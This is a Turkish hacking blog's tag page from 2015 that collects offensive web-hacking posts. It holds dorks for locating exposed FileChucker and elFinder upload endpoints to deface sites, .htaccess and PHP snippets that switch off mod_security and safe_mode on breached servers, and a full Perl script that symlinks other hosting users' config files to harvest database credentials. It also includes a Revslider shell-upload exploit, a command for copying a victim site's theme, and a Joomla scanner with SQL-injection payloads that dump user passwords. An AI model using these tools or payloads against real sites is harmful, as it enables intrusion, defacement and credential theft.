Web Hacking etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Web Hacking etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
4 Eylül 2015 Cuma
Wordpress Config Bilgilerini Çekme [Revslider]
Xampp Açıgının Kullanımı [Video]
18 Mayıs 2015 Pazartesi
Airties Modem Port Açma
Wordpress Shell ve İndex Atma
Wordpress Toplu Config Çekme ve Hackleme
15 Mayıs 2015 Cuma
Kali Linux Vega Scanner Kullanımı
Kali Linux Sqlmap Kullanımı
Kali Linux Wpscan Kullanımı
FilerChucker Upload Açığı
Ekleyen:
Admin
Tarih:
Cuma, Mayıs 15, 2015
Merhabalar bu açık çoğu sitede bulunmaktadır.İndex upload edebilirsiniz.Tek yapmanız gereken dorku aratıp index.php dosyanızı eklemektir.
DORK: inurl:/cgi-bin/filechucker.cgi
Devamı...
DORK: inurl:/cgi-bin/filechucker.cgi
Mod Security Bypass Etme
Ekleyen:
Admin
Tarih:
Cuma, Mayıs 15, 2015
bazı serverlere girdiginizde mod security hatası verir bunun bircok bypass etme taktigi vardır. Buda onlardan biri
Öncellikle shellli açip > .htaccess dosyasini bulup düzenleyelim içindeki tüm kodları silelim.
Ekliyoruz ve bypass edildi. Çalişmaz ise önce deneyin çalişmaz ise chmod degerini 755 verip tekrar deneyin
Devamı...
Öncellikle shellli açip > .htaccess dosyasini bulup düzenleyelim içindeki tüm kodları silelim.
Kod:
Addhandler writed by hcinou
DirectoryIndex index.html
<Directory />
Options FollowSymLinks
Options All +Indexes +FollowSymLinks
Options All +ExecCGI
Options All +Indexes
Options All +FollowSymLinks
Options All +SymLinksIfOwnerMatch
Options All +MultiViews
Options All +Includes
Options All +IncludesNOEXEC
Options All +IndexOptions +FancyIndexing
AllowOverride None
AllowOverride All
order allow,deny
allow from all
</Directory>
AddType text/plain .php
AddType text/plain .htaccess
AddHandler server-parsed .php
Addhandler cgi-script .asp
ForceType application/x-httpd-php4
HeaderName 1.txt
ReadmeName 1.txt
AddDefaultCharset utf-8
RewriteEngine On
RewriteRule ^sitemap.xml/?$ md_sitemap.php [QSA,NC,L]
RewriteRule ^src/(.*)/page/([0-9]+)/?$ index.php?src=$1&page=$2 [QSA,NC,L]
RewriteRule ^src/(.*)/?$ index.php?src=$1 [QSA,NC,L]
RewriteRule ^web/(.*) web.php?url=$1 [QSA,NC,L]
RewriteRule (.*).was$ $1.was
RewriteRule .* – [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} -f [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^(.+) – [PT,L]
RewriteRule ^(.*) index.php
</IfModule>
<IfModule Mod_security.c>
SecFilterEngine OFF SecFilterEngine OFF
SecFilterScanPort OFF SecFilterScanPort OFF
SecFilterCheckURLEncoding OFF SecFilterCheckURLEncoding OFF
SecFilterCheckUnicodeEncoding OFF SecFilterCheckUnicodeEncoding OFF
RewriteRule (.*).was$ $1.was
</IfModule> </ IfModule>
Shell Üzerinden Script veya Tema Çekme
Ekleyen:
Admin
Tarih:
Cuma, Mayıs 15, 2015
Shell attıgımız bir sitenin temasını yada scriptini begendin çekmek istiyoruz diyelim..
yukarda kodu shell üzerinde çalıstırarak kolayca yapabiliriz.
kodda wordpress bir sitenin teması çekilmek üzere editlenmiş siz shell sokunca bunu siteye göre editliceksiniz.
Anlatacak olursak shell üzerinde temanın bulundugu dizini alıyoruz "cd"den sonrasına ";tar cvzf" olan kısma kadar editliyoruz ",tar cvzf"den sonraki alan ise tema'yı çektikten sonra nereye kayıt edecegini ve kayıt edilecek dosyanın ismini belirler kodda "script adında kayıt edilmesi istenmiştir." .tar.gz ise kayıt türünün formatını gösterir.
kayıt yerini "/home/site/public_html/" yaparsak sitenin public dosyalarının arasına kayıt eder. bunu nasıl indirebiliriz derseniz
site.com/script.tar.gz yaptıgımızda direk olarak tema bilgisayarımıza inecektir.
aynı yöntemle eklentilerinide çekebilirsiniz.
Wordpress'lerde bazı temalar eklentiler olmadan eksik çalısabilir o yüzden eklentileride çekmekte fayda vardır.
Açıklayıcı olmadıysa denk geldiginde bide video çekerim
Devamı...
Kod:
cd /home/site/public_html/wp-content/themes/avada/;tar cvzf /home/site/public_html/wp-content/script.tar.gz *
kodda wordpress bir sitenin teması çekilmek üzere editlenmiş siz shell sokunca bunu siteye göre editliceksiniz.
Anlatacak olursak shell üzerinde temanın bulundugu dizini alıyoruz "cd"den sonrasına ";tar cvzf" olan kısma kadar editliyoruz ",tar cvzf"den sonraki alan ise tema'yı çektikten sonra nereye kayıt edecegini ve kayıt edilecek dosyanın ismini belirler kodda "script adında kayıt edilmesi istenmiştir." .tar.gz ise kayıt türünün formatını gösterir.
kayıt yerini "/home/site/public_html/" yaparsak sitenin public dosyalarının arasına kayıt eder. bunu nasıl indirebiliriz derseniz
site.com/script.tar.gz yaptıgımızda direk olarak tema bilgisayarımıza inecektir.
aynı yöntemle eklentilerinide çekebilirsiniz.
Wordpress'lerde bazı temalar eklentiler olmadan eksik çalısabilir o yüzden eklentileride çekmekte fayda vardır.
Açıklayıcı olmadıysa denk geldiginde bide video çekerim
En Hızlı 5 Dns Adresi - 2015
Ekleyen:
Admin
Tarih:
Cuma, Mayıs 15, 2015
1. Level3 DNS
Yapılan hız testlerine göre level3 (209.244.0.3 – 209.244.0.4) en hızlı dns çözümü olarak tespit edilmiştir.
2. OpenDns
En çok kullanılan dns’lerden bir tanesidir. OpenDNS (208.67.222.222 – 208.67.220.220) uzun süredir hizmet vermektedir. Hızlı ve güvenli bir internet için iyi bir seçim olacaktır.
3. Yandex DNS
Yandex arama motorunun yeni projesi olan Yandex Dns, yüksek hız ve güvenlik garantisi sunmaktadır. (77.88.8.8 -77.88.8.1) numaralarını kullanabileceğiz bu dns, 80’den fazla dns sunucusuna sahiptir. Size en yakın sunucuyu otomatik olarak baz alınır..
4. Comodo Secure DNS
Comodo antivirüs programının geliştirdiği bir hizmettir. 8.26.56.26 – 8.20.247.20 adreslerini kullanarak hizmetten faydalanabilirsiniz.
5. Google DNS
İnternet kullanıcılarının ezbere bildiği ve akılda kalıcı olan Google DNS’yi, 8.8.8.8 – 8.8.4.4 dns numaralarını girerek kullanmaya hemen başlayabilirsiniz.
Devamı...
Yapılan hız testlerine göre level3 (209.244.0.3 – 209.244.0.4) en hızlı dns çözümü olarak tespit edilmiştir.
2. OpenDns
En çok kullanılan dns’lerden bir tanesidir. OpenDNS (208.67.222.222 – 208.67.220.220) uzun süredir hizmet vermektedir. Hızlı ve güvenli bir internet için iyi bir seçim olacaktır.
3. Yandex DNS
Yandex arama motorunun yeni projesi olan Yandex Dns, yüksek hız ve güvenlik garantisi sunmaktadır. (77.88.8.8 -77.88.8.1) numaralarını kullanabileceğiz bu dns, 80’den fazla dns sunucusuna sahiptir. Size en yakın sunucuyu otomatik olarak baz alınır..
4. Comodo Secure DNS
Comodo antivirüs programının geliştirdiği bir hizmettir. 8.26.56.26 – 8.20.247.20 adreslerini kullanarak hizmetten faydalanabilirsiniz.
5. Google DNS
İnternet kullanıcılarının ezbere bildiği ve akılda kalıcı olan Google DNS’yi, 8.8.8.8 – 8.8.4.4 dns numaralarını girerek kullanmaya hemen başlayabilirsiniz.
Toplu config cekme perl - Videolu
Ekleyen:
Admin
Tarih:
Cuma, Mayıs 15, 2015
.htaccess
Kod:Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .pl AddHandler cgi-script .pl AddHandler cgi-script .plKod:ch.pl #!/usr/bin/perl -I/usr/local/bandmin print "Content-type: text/html\n\n"; print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ****** http-equiv="Content-Language" content="en-us" /> ****** http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>SwordFish Priv8 Config</title> <style type="text/css"> .newStyle1 { font-family: Tahoma; font-size: x-large; color: #000000; background-color: #E56717; text-align: center; } </style> </head> '; sub lil{ ($user) = @_; $msr = qx{pwd}; $kola=$msr."/".$user; $kola=~s/\n//g; symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'.txt'); symlink('/home/'.$user.'/public_html/includes/config.php',$kola.'1.txt'); symlink('/home/'.$user.'/public_html/config.php',$kola.'2.txt'); symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'3.txt'); symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.'5.txt'); symlink('/home/'.$user.'/public_html/admin/config.php',$kola.'4.txt'); symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'13.txt'); symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'14.txt'); symlink('/home/'.$user.'/public_html/conf_global.php',$kola.'6.txt'); symlink('/home/'.$user.'/public_html/include/db.php',$kola.'7.txt'); symlink('/home/'.$user.'/public_html/connect.php',$kola.'8.txt'); symlink('/home/'.$user.'/public_html/mk_conf.php',$kola.'9.txt'); symlink('/home/'.$user.'/public_html/configuration.php',$kola.'10.txt'); symlink('/home/'.$user.'/public_html/include/config.php',$kola.'12.txt'); symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'11.txt'); symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'15.txt'); symlink('/home/'.$user.'/public_html/whmc/configuration.php',$kola.'16.txt'); symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'17.txt'); symlink('/home/'.$user.'/public_html/inc/db.php',$kola.'18.txt'); symlink('/home/'.$user.'/public_html/db.php',$kola.'19.txt'); } if ($ENV{'REQUEST_METHOD'} eq 'POST') { read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); } else { $buffer = $ENV{'QUERY_STRING'}; } @pairs = split(/&/, $buffer); foreach $pair (@pairs) { ($name, $value) = split(/=/, $pair); $name =~ tr/+/ /; $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $value =~ tr/+/ /; $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $FORM{$name} = $value; } if ($FORM{pass} eq ""){ print ' <body class="newStyle1"> <p>SwordFish Config PerL</p> <p>TopLu Config Cekme</p> <form method="post"> <textarea name="pass" style="width: 543px; height: 420px"></textarea> <br /> <input name="tar" type="text" style="width: 212px" /><br /> <input name="Submit1" type="submit" value="submit" style="width: 99px" /><br /> </form>'; }else{ @lines =<$FORM{pass}>; $y = @lines; open (MYFILE, ">tar.tmp"); print MYFILE "tar -czf ".$FORM{tar}.".tar "; for ($ka=0;$ka<$y;$ka++){ while(@lines[$ka] =~ m/(.*?):x:/g){ &lil($1); print MYFILE $1.".txt "; for($kd=1;$kd<18;$kd++){ print MYFILE $1.$kd.".txt "; } } } print'<body class="newStyle1"> <p>Done !!</p> <p> </p>'; if($FORM{tar} ne ""){ open(INFO, "tar.tmp"); @lines =<INFO> ; close(INFO); system(@lines); print'<p><a href="'.$FORM{tar}.'.tar">Click here 2 download tar file</a></p>'; } } print" </body> </html>";
Video;
Server Güvenligini Kapatma - Devre Dışı Bırakma
Ekleyen:
Admin
Tarih:
Cuma, Mayıs 15, 2015
webr00t gibi sheller ile kapatilabiliyor ama her serverde işlev görmemektedir. Bende sizler için arşivdeki dosyaları inceledim ve buldum
Shell'i açalım ve anadizindeki .htaccess dosyasını düzenleyelim ( .htaccess yoksa oluşturun )
İçindeki kodları silip alttaki kodları yazıp kaydedin.
Daha sonra ini.php adında bir dosya oluşturalım.
Devamı...
Shell'i açalım ve anadizindeki .htaccess dosyasını düzenleyelim ( .htaccess yoksa oluşturun )
İçindeki kodları silip alttaki kodları yazıp kaydedin.
Kod:
<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
Kod:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"file"sansursansursansur93;);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"ss"sansursansursansur93;);
?>
Dns Hacking
Ekleyen:
Admin
Tarih:
Cuma, Mayıs 15, 2015
DNS Hijacking
DNS: Domain Name Sistem
İnternet dünyasının çalışmasını sağlayan ana protokoller incelediğinde güvenlik açısından en önemli protokollerden birinin DNS olduğu ortaya çıkmaktadır. Basitçe DNS, günümüz e-posta iletişiminin ve internet altyapısının sağlıklı çalışmasında kritik rol oynamaktadır. DNS güvenliğinden kasıt genellikle
DNS kullanılarak gerçekleştirilen dns cache poisoning ve erişilebilirliği hedef alan DoS saldırıları olmaktadır. Özellikle DNS’e yönelik DoS/DDoS saldırıları son yıllarda ciddi oranda artış göstermektedir.
DNS’in UDP üzerine kurulmuş olması ve UDP üzerinden gerçekleştirilen iletişimde kaynak IP adresinin gerçek olup olmadığını anlamanın kesin bir yolunun olmaması saldırganın kendini gizleyerek saldırı gerçekleştirmesini kolaylaştırmakta ve engellemeyi zorlaştırmaktadır.
DNS’in yapısı
DNS sistemi isim sunucuları ve çözümleyicilerinden oluşur. İsim sunucuları olarak düzenlenen bilgisayarlar host isimlerine karşılık gelen IP adresi bilgilerini tutarlar. Çözümleyiciler ise DNS istemcilerdir. DNS istemcilerde, DNS sunucu yada sunucuların adresleri bulunur.
DNS Sunucu Çeşitleri
DNS Sunucu Çeşitleri Üç’e Ayrılırlar
1- Primary Name Server
2- Secondary Name Server
3- Caching-Only Name Server
Şimdi Gelelim Asıl Konu Başlığımız’a
Nedir DNS Hijacking ?
Bir Saldırı Türüdür. Web siteleri bu ataktklardan Name Serverların Yönetildiği Domain Panelin Üzerinden Yâda Host Üzerinde Tanımlı Olan NAME Serverların Alanında Değişiklik Yapılmasını Sunan “Hacking” Yöntemidir. Web Sitelerin Name Serverları Ele Geçirildiği Takdirde Domanin Yani Alan Adı Yönetimi Tarafımıza Geçmiş Demektir. DNS Domain Name Sistemin Kısaltılmış Şeklidir ve Alan İsimlendirme Olarakta Bilinmektedir. DNS Kolay Anlaşılabilir ve Kullanılabilir makine ve alan isimleri ile makine IP adresleri arasında çift taraflı dönüşümü Sağlar. DNS İle Hangi Site Nerde Hangi IP Hangi Bilgisayar Ait Olduğu Belirlenir ve İstediğiniz Yere Erişebilirsiniz.

DNS Name Server Güvenlik Açıklarından Bahsedecek Olursak
İllegal Bir Kullanıcı Sistemin Mevcut Tüm UDP Portlarını Dinleyebilir
DNS Zehirlenmesi Olarakta Adlandırabiliriz
Günümüzde Çıkan Mahkeme Kararları İle Web Sitelerine Yasaklamalar Getirilmiştir Ancak Günümüz Kullanıcıları Bununda Çaresini DNS ile Bulmuştur.
Örnek Verecek Olur isek Yasaklı Bir Web Sitesini
Windows 7 İle Uyumlu:
Başlat + Denetim Masası + Ağ ve İnternet + Ağ ve Paylaşım Merkezi + Yerel Ağ Bağlantısı
Özellikler
İnternet Protokol Sürümü 4 (TCP/IPv4)
Devamı...
İnternet dünyasının çalışmasını sağlayan ana protokoller incelediğinde güvenlik açısından en önemli protokollerden birinin DNS olduğu ortaya çıkmaktadır. Basitçe DNS, günümüz e-posta iletişiminin ve internet altyapısının sağlıklı çalışmasında kritik rol oynamaktadır. DNS güvenliğinden kasıt genellikle
DNS kullanılarak gerçekleştirilen dns cache poisoning ve erişilebilirliği hedef alan DoS saldırıları olmaktadır. Özellikle DNS’e yönelik DoS/DDoS saldırıları son yıllarda ciddi oranda artış göstermektedir.
DNS’in UDP üzerine kurulmuş olması ve UDP üzerinden gerçekleştirilen iletişimde kaynak IP adresinin gerçek olup olmadığını anlamanın kesin bir yolunun olmaması saldırganın kendini gizleyerek saldırı gerçekleştirmesini kolaylaştırmakta ve engellemeyi zorlaştırmaktadır.
DNS sistemi isim sunucuları ve çözümleyicilerinden oluşur. İsim sunucuları olarak düzenlenen bilgisayarlar host isimlerine karşılık gelen IP adresi bilgilerini tutarlar. Çözümleyiciler ise DNS istemcilerdir. DNS istemcilerde, DNS sunucu yada sunucuların adresleri bulunur.
DNS Sunucu Çeşitleri
DNS Sunucu Çeşitleri Üç’e Ayrılırlar
1- Primary Name Server
2- Secondary Name Server
3- Caching-Only Name Server
Şimdi Gelelim Asıl Konu Başlığımız’a
Nedir DNS Hijacking ?
Bir Saldırı Türüdür. Web siteleri bu ataktklardan Name Serverların Yönetildiği Domain Panelin Üzerinden Yâda Host Üzerinde Tanımlı Olan NAME Serverların Alanında Değişiklik Yapılmasını Sunan “Hacking” Yöntemidir. Web Sitelerin Name Serverları Ele Geçirildiği Takdirde Domanin Yani Alan Adı Yönetimi Tarafımıza Geçmiş Demektir. DNS Domain Name Sistemin Kısaltılmış Şeklidir ve Alan İsimlendirme Olarakta Bilinmektedir. DNS Kolay Anlaşılabilir ve Kullanılabilir makine ve alan isimleri ile makine IP adresleri arasında çift taraflı dönüşümü Sağlar. DNS İle Hangi Site Nerde Hangi IP Hangi Bilgisayar Ait Olduğu Belirlenir ve İstediğiniz Yere Erişebilirsiniz.
DNS Name Server Güvenlik Açıklarından Bahsedecek Olursak
İllegal Bir Kullanıcı Sistemin Mevcut Tüm UDP Portlarını Dinleyebilir
DNS Zehirlenmesi Olarakta Adlandırabiliriz
Günümüzde Çıkan Mahkeme Kararları İle Web Sitelerine Yasaklamalar Getirilmiştir Ancak Günümüz Kullanıcıları Bununda Çaresini DNS ile Bulmuştur.
Örnek Verecek Olur isek Yasaklı Bir Web Sitesini
Windows 7 İle Uyumlu:
Başlat + Denetim Masası + Ağ ve İnternet + Ağ ve Paylaşım Merkezi + Yerel Ağ Bağlantısı
Özellikler
İnternet Protokol Sürümü 4 (TCP/IPv4)
Wordpress Revslider Plugins Shell Upload Exploit
Ekleyen:
Admin
Tarih:
Cuma, Mayıs 15, 2015
Bir çok arkadaşın özellikle istediği piyasada benzeri olsada pek bulunmayan kullanışlı bir exploittir.
kullanımı kısaca anlatayım site "http://" ise dosya içinden "http" olanı şeçiniz. "https://" olanlar için diger materyali kullanınız.
Resimdeki gibi " 200 OK " Sonucu aldıgınızda sitenin sonuna
/wp-content/plugins/revslider/temp/update_extract/revslider/x.php yazdıgınızda shelle ulaşmış olursunuz.
pentest.txt
asp shell
upload shelli
2 adet php shell uploadı yapar.
dosyayı incelediginizde anlarsınız zaten
İndir - Download
Devamı...
kullanımı kısaca anlatayım site "http://" ise dosya içinden "http" olanı şeçiniz. "https://" olanlar için diger materyali kullanınız.
Resimdeki gibi " 200 OK " Sonucu aldıgınızda sitenin sonuna
/wp-content/plugins/revslider/temp/update_extract/revslider/x.php yazdıgınızda shelle ulaşmış olursunuz.
pentest.txt
asp shell
upload shelli
2 adet php shell uploadı yapar.
dosyayı incelediginizde anlarsınız zaten
İndir - Download
Etiketler:
Exploitler
,
Hack Tools
,
PC Hacking
,
Security
,
Web Hacking
14 Mayıs 2015 Perşembe
Genel Telnet Komutları
Ekleyen:
Admin
Tarih:
Perşembe, Mayıs 14, 2015
ls :Dizinde bulunan herşeyi listeler.
ls -a :Gizli dosylar ve dizinlerle beraber listeler.
ls -l :Bütün dosyları boyut ve tarihini göstererek listeler.
tar -zxpf :Uzantısı tar.gz olan sıkıştırılmış dosyaları açar.
tar -xpf :Uzantısı .tar olan dosyaları açar.
gunzip :Uzantısı .gz olan dosları açar.
cp :Dosyayı kopyalar.
mv :Bir dosyayı başka bir dizine taşımanızı sağlar yada dosya adını değiştirir.
mkdir :Yeni bir dizin oluşturmanızı sağlar.
rmdir :Belirtilen dizini silmenizi sağlar.
rm :Dosya silmenizi sağlar.
rm -rf :Dizin silmenizi sağlar.
cd :Belirtilen dizine geçmenizi sağlar.
cd .. :Bir üst dizine geçmenizi sağlar.
cd ~ :En üst dizine çıkmanızı sağlar
pwd :O anda bulunduğunuz dizini görüntüler
pico :Belirtilen dosyayı text editör ile düzenlemenizi sağlar
ftp :Belirtilen siteye FTP bağlantısı sağlar
lynx :Belirtilen siteyi görüntüler
df :Harddisk istatistiklerini gösterir
quota :Disk kullanımınızı gösterir
uname :İşletim sisteminin durumunu gösterir
whoami :Kendi bilgilerinizi gösterir
who :Sunucuya bağlı olanları gösterir
last :Hesabınıza yapılan en son bağlantıyı gösterir
whereis :Belirtilen dosyanın nerede olduğunu gösterir
BitchX :IRC programını çalıştırır
mail :Postalarınızı kontrol eder
ps -x :Sizin çalıştırdığınız işlemleri gösterir
ps -a :Sunucuda çalıştırılan tüm işlemleri gösterir
ps -ux :Çalıştırılan işlemlerin CPU/RAM kullanımıyla gösterir
kill :Pid numarası verilen işlemi durdurur
kill -9 :Pid numarası verilen eggdrop işlemini durdurur
killall :Belirtilen program türündeki tüm işlemleri durdurur
whatis :Belirtilen komutun açıklamasını verir
man :Komut hakkında yardım görüntüler
passwd :Shell hesabınıza girerken kullandığınız şifreyi değiştirmenizi sağlar
vhosts yada vhost :Sistemde bulunan virtual hostları listeler.BNC için kullanabilirsiniz
Devamı...
ls -a :Gizli dosylar ve dizinlerle beraber listeler.
ls -l :Bütün dosyları boyut ve tarihini göstererek listeler.
tar -zxpf :Uzantısı tar.gz olan sıkıştırılmış dosyaları açar.
tar -xpf :Uzantısı .tar olan dosyaları açar.
gunzip :Uzantısı .gz olan dosları açar.
cp :Dosyayı kopyalar.
mv :Bir dosyayı başka bir dizine taşımanızı sağlar yada dosya adını değiştirir.
mkdir :Yeni bir dizin oluşturmanızı sağlar.
rmdir :Belirtilen dizini silmenizi sağlar.
rm :Dosya silmenizi sağlar.
rm -rf :Dizin silmenizi sağlar.
cd :Belirtilen dizine geçmenizi sağlar.
cd .. :Bir üst dizine geçmenizi sağlar.
cd ~ :En üst dizine çıkmanızı sağlar
pwd :O anda bulunduğunuz dizini görüntüler
pico :Belirtilen dosyayı text editör ile düzenlemenizi sağlar
ftp :Belirtilen siteye FTP bağlantısı sağlar
lynx :Belirtilen siteyi görüntüler
df :Harddisk istatistiklerini gösterir
quota :Disk kullanımınızı gösterir
uname :İşletim sisteminin durumunu gösterir
whoami :Kendi bilgilerinizi gösterir
who :Sunucuya bağlı olanları gösterir
last :Hesabınıza yapılan en son bağlantıyı gösterir
whereis :Belirtilen dosyanın nerede olduğunu gösterir
BitchX :IRC programını çalıştırır
mail :Postalarınızı kontrol eder
ps -x :Sizin çalıştırdığınız işlemleri gösterir
ps -a :Sunucuda çalıştırılan tüm işlemleri gösterir
ps -ux :Çalıştırılan işlemlerin CPU/RAM kullanımıyla gösterir
kill :Pid numarası verilen işlemi durdurur
kill -9 :Pid numarası verilen eggdrop işlemini durdurur
killall :Belirtilen program türündeki tüm işlemleri durdurur
whatis :Belirtilen komutun açıklamasını verir
man :Komut hakkında yardım görüntüler
passwd :Shell hesabınıza girerken kullandığınız şifreyi değiştirmenizi sağlar
vhosts yada vhost :Sistemde bulunan virtual hostları listeler.BNC için kullanabilirsiniz
Joomla Scanner v.3 [Python]
Ekleyen:
Admin
Tarih:
Perşembe, Mayıs 14, 2015
Kod: [Seç]
#!/usr/bin/python
# Powered By Dr.AFN[D]ENA
import sys,urllib2,time,httplib
mtucx = 5
dzx = 4
print "joomla Scanner v.3"
print "Gr3etZ to : Makers Hacker Team"
print "pyhthon joomla.py www.site.com"
BAD_RESP = [400,401,404]
def main(path):
print "Scan:",host.split("/",1)[1]+path
try:
h = httplib.HTTP(host.split("/",1)[0])
h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
h.putheader("Host", host.split("/",1)[0])
h.endheaders()
resp, reason, headers = h.getreply()
return resp, reason, headers.get("Server")
except(), msg:
print "Error Occurred:",msg
pass
def timer():
now = time.localtime(time.time())
return time.asctime(now)
dzx = { "index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--" : ["com_idoblog"], "index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--" : ["com_ignitegallery"], "index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" : ["com_media"], "administrator/components/com_redmystic/chart/tmp-upload-images/" : ["com_redmystic"], "index.php?option=com_users&view=registration" : ["com_user"], "index.php?option=com_jce" : ["JCE","link"], "index.php?option=com_user&view=reset&layout=confirm" : ["com_user"], "index.php?option=com_smartformer":["com_smartformer"],"index.php?option=com_garyscookbook&func=newItem":["com_garyscookbook"],"index.php/component/osproperty/?task=agent_register":["com_osproperty"]}
if len(sys.argv) != 2:
sys.exit(1)
host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
if host[-1] != "/":
host = host+"/"
print "\nTarget:",host
print "\nScanning Exploit\n"
for xpl,(poc) in dzx.items():
resp,reason,server = main(xpl)
if resp not in BAD_RESP:
print ""
print "\nResult:",resp, reason
print "\nVuln",poc
else:
print ""
print "\nResult:",resp, reason
print
print "\nEnd\n"
Etiketler:
Exploitler
,
Hack Tools
,
Web Hacking
ElFinder Upload Açığı |Detaylı ve Videolu Anlatım|
Ekleyen:
Admin
Tarih:
Perşembe, Mayıs 14, 2015
Merhaba Arkadaşlar,
Bugün Sizlere Upload Açıklarından Bahsedeceğim.
Bu Açıkla Siteye Dosya Dahil Edebilirsiniz, Dosya Silebilirsiniz ve Dosyanın Adını Değiştirebilirsiniz.
Kullanım:
İlk Olarak Arama Motoruna Dorklarımızı Yazıyoruz.
Dorklar:
inurl:elfinder.html
inurl:/elfinder/elfinder.html
inurl:ckeditor/elfinder/elfinder.html
Açık Bulunan Siteye Dosyamızı Seçerek Upload Ediyoruz.
Sonra Dosyamızı Open Butonuyla Açıyoruz ve İndeximiz Yüklenmiş.
Bugün Sizlere Upload Açıklarından Bahsedeceğim.
Bu Açıkla Siteye Dosya Dahil Edebilirsiniz, Dosya Silebilirsiniz ve Dosyanın Adını Değiştirebilirsiniz.
Kullanım:
İlk Olarak Arama Motoruna Dorklarımızı Yazıyoruz.
Dorklar:
inurl:elfinder.html
inurl:/elfinder/elfinder.html
inurl:ckeditor/elfinder/elfinder.html
Açık Bulunan Siteye Dosyamızı Seçerek Upload Ediyoruz.
Sonra Dosyamızı Open Butonuyla Açıyoruz ve İndeximiz Yüklenmiş.
Video Anlatımı Alıntıdır:
Kaydol:
Kayıtlar
(
Atom
)




